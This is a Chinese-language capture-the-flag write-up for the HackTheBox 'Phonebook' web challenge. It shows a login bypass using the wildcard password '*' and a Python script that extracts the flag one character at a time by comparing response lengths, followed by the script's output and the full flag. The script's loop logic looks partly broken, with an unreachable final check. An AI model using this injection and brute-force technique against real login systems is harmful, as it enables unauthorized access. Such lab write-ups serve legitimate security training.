首页 靶场练习 HackTheBox Web

# 信息收集

题目提示:Who is lucky enough to be included in the phonebook?

主页又给出了用户名,那么我们可以尝试万能密码进去

用通配符 * 进来了 ==、

然后开始不明所以,搜索随便搜了一下,出现了一堆人名,但除了 Reese 以外都不能用通配符登录,全程没有 flag 的迹象

查过资料发现那个通配符的具体字符串就是 flag,验证方法就是使用 HTB{*} 做密码,发现也能登陆进去,也就是说我们需要爆破密码 ==、

# 构造攻击

爆破脚本

# -*- coding: utf-8 -*-
"""
Created on Tue May  4 14:11:24 2021
@author: Fstraw
"""
import requests
import string
pw = 'HTB{'
url = 'http://xxx/login'
#HTB 的 flag 由英文大小写和数字和下划线构成。
words = string.ascii_lowercase + string.ascii_uppercase + '0123456789_'
i = 0
while True:
    #遍历所有字符串
    for w in words:
        #提交的值
        data = {'username':'reese','password':pw + w + '*' }
        r = requests.post(url,data)
        lenth = r.headers['Content-Length'] 
        #登录成功的长度为 2586
        if lenth == '2586':  
            pw = pw + w
            print('==============')
            print(pw)
            #跳出 for 循环
            break
            data = {'username':'reese','password':pw + '}'}
            r = requests.post(url,data)
            if r.headers['Content-Length'] == '2586':   
                #输出 flag
                print('==============')
                print(pw + '}')
                #跳出 while 循环
        break
# SHELL
┌──(root💀kali)-[~]
└─# python3 1.py                                                     1 ⨯ 1 ⚙
==============
HTB{d
==============
HTB{d1
==============
HTB{d1r
==============
HTB{d1re
==============
HTB{d1rec
==============
HTB{d1rect
==============
HTB{d1recto
==============
HTB{d1rector
==============
HTB{d1rectory
==============
HTB{d1rectory_
==============
HTB{d1rectory_h
==============
HTB{d1rectory_h4
==============
HTB{d1rectory_h4x
==============
HTB{d1rectory_h4xx
==============
HTB{d1rectory_h4xx0
==============
HTB{d1rectory_h4xx0r
==============
HTB{d1rectory_h4xx0r_
==============
HTB{d1rectory_h4xx0r_i
==============
HTB{d1rectory_h4xx0r_is
==============
HTB{d1rectory_h4xx0r_is_
==============
HTB{d1rectory_h4xx0r_is_k
==============
HTB{d1rectory_h4xx0r_is_k0
==============
HTB{d1rectory_h4xx0r_is_k00
==============
HTB{d1rectory_h4xx0r_is_k00l
==============
HTB{d1rectory_h4xx0r_is_k00l}